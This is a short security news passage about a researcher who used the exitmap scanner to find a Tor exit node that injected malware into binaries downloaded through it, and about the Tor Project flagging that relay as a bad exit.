“To have the best chance of catching modified binaries in transit over the Internet, I needed as many exit points in as many countries as possible. Using Tor would give me this access, and thus the greatest chance of finding someone conducting this malicious MITM patching activity,” Pitts wrote.

“After researching the available tools, I settled on exitmap. Exitmap is Python-based and allows one to write modules to check exit nodes for various modifications of traffic. Exitmap is the result of a research project called Spoiled Onions that was completed by both the PriSec group at Karlstad University and SBA Research in Austria. I wrote a module for exitmap, named, and have submitted a pull request to the official GitHub repository. Soon after building my module, I let exitmap run. It did not take long, about an hour, to catch my first malicious exit node.”

Pitts downloaded several legitimate binaries from trusted sources, including, and each of them came loaded with malware code that opens a port to listen for commands and starts sending HTTP requests to a C&C server.

The researcher informed officials of the Tor Project, who flagged the Tor exit node as bad.

“We’ve now set the BadExit flag on this relay, so others won’t accidentally run across it. We certainly do need more people thinking about more modules for the exitmap scanner. In general, it seems like a tough arms race to play,” wrote Roger Dingledine, one of the original developers of Tor.

The attack scenario described by Pitts is very common: users should be wary of the repository referenced for software download, making sure that they are using encrypted channels (TLS/SSL).

“The problem of modified binaries is not limited to Tor. We highlight the example because of some of the misconceptions people have about Tor providing increased safety. In general, users should be wary of where they download software and ensure they are using TLS/SSL. Sites not supporting TLS/SSL should be persuaded to do so,” Pitts said.

Pierluigi Paganini

Security Affairs –  (Tor exit nodes, hacking)